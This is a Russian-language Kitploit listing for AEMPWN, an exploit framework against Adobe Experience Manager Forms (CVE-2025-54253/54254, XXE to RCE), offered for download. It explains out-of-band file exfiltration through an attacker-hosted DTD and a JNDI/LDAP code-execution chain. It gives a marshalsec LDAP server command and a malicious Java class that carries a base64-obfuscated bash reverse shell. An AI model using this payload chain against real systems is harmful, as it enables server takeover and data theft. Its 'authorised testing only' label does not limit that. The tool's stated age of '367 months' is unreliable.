Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
AEMPWN — CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE Фреймворк | Kitploit
Инструменты/GitHubGitHub/zoomdbz/aempwn
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubzoomdbz/aempwn

AEMPWN

CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE Фреймворк

Репозиторий
367 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

AEMPWN

Сканер AEM Forms для CVE-2025-54253 и CVE-2025-54254

AEMPWN — это целенаправленный сканер для выявления высокорисковых уязвимостей Adobe Experience Manager (AEM) Forms с поддержкой безопасного обнаружения, слепого подтверждения внеполосным (OOB) способом и полного цикла проверки эксплойта (PoC). Данный инструмент предназначен только для авторизованного тестирования безопасности.

Поддерживаемые уязвимости

CVE-2025-54253
Удалённое выполнение кода, зависящее от конфигурации в AEM Forms (JEE)

CVE-2025-54254
Внедрение XML-внешних сущностей (XXE), приводящее к раскрытию файлов и потенциальной эскалации

Режимы работы

AEMPWN поддерживает три режима выполнения для согласования с реальными процессами баг-баунти и красных команд.

1. Безопасный режим PoC (--poc)

Назначение:
Определить небезопасное поведение парсера XML и возможную поверхность эксплойта без выполнения деструктивных действий.

Что проверяется:

  • Отражение XML
  • Не-HTML структурированные ответы
  • Отражение канарных токенов
  • Признаки небезопасной обработки XML

Использовать, когда:

  • Нужна малошумная проверка
  • Вы ещё определяете степень воздействия
  • Требуется безопасный сигнал перед эскалацией

Данный режим подходит для раннего триажа и внутренней отчётности.

2. Режим OOB XXE (--oob)

Назначение:
Подтверждение слепой XXE через исходящие запросы с сервера AEM.

Важное уточнение:
Burp Collaborator (или аналогичные сервисы) только наблюдают исходящие соединения. Они не могут:

  • Размещать произвольные DTD-файлы
  • Обслуживать вредоносные полезные нагрузки
  • Возвращать ответы, управляемые атакующим
  • Поддерживать эксплуатацию через LDAP/JNDI

Таким образом, одного Collaborator недостаточно для полной эксплуатации OOB XXE.

Что вам потребуется:

  • HTTP-сервер под вашим контролем (VPS, облачный экземпляр, локальный сервер с туннелем и т.д.)
  • Возможность разместить DTD-файл
  • Возможность наблюдать входящие HTTP-запросы и параметры запроса

Что доказывается:

  • Парсер XML загружает внешние сущности
  • Цель выполняет исходящие сетевые запросы
  • Можно прочитать и извлечь конфиденциальные локальные файлы

3. Режим RCE (--rce)

Назначение:
Демонстрация фактического выполнения кода на сервере AEM с воздействием уровня P1.

Этот режим основан на внедрении JNDI через парсинг XML, что требует инфраструктуры за пределами HTTP-колбэков.

Что вам потребуется:

  • Работающий LDAP-сервер, способный обслуживать ссылку на Java-класс
  • HTTP-сервер, на котором размещён скомпилированный Java-класс
  • Управляемый примитив выполнения (например, создание файла, исходящий колбэк)

Почему необходим LDAP:

  • Парсер XML пытается разрешить JNDI-ссылку
  • Сервер AEM подключается к вашему LDAP-слушателю
  • LDAP-ответ указывает на Java-класс
  • Класс загружается и выполняется JVM

Лучший инструмент: marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/#Exploit" 1389

http://your-server/#Exploit = HTTP-сервер, обслуживающий Exploit.class (скомпилированный вредоносный класс).

Пример вредоносного класса (простой touch /tmp/pwned или реверс-шелл):

import java.io.IOException;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("touch /tmp/pwned");
            // или реверс-шелл: Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {}
    }
}

Скомпилировать → разместить на HTTP-сервере (том же, что и DTD, или отдельном).
Когда AEM обрабатывает сущность → подключается к вашему LDAP → загружает класс → выполняет код.

Ключевое ограничение:

Burp Collaborator не может:

  • Обслуживать LDAP-ответы
  • Размещать Java-классы
  • Запускать загрузку классов на основе JNDI

По этой причине режим RCE не может работать без настоящего LDAP-сервиса.

О Burp Collaborator

Burp Collaborator (и аналогичные платформы) полезны только для обнаружения.

Они могут подтвердить:

  • DNS-запросы
  • HTTP- или HTTPS-колбэки
  • Слепую исходящую связь

Они не могут:

  • Размещать DTD-файлы
  • Обрабатывать содержимое извлечённых файлов
  • Обслуживать Java-классы
  • Поддерживать эксплуатацию через JNDI или LDAP

Используйте Collaborator для наблюдения, но не для доставки полезных нагрузок.

Вывод

Подтверждённые находки записываются в выходной файл (по умолчанию: aem-forms-scan.txt) и включают:

  • Базовый URL цели
  • Затронутую конечную точку
  • Наблюдаемые сигналы обнаружения
  • Индикаторы, специфичные для режима
  • Видео-PoC (дружественный формат)
Скачать инструмент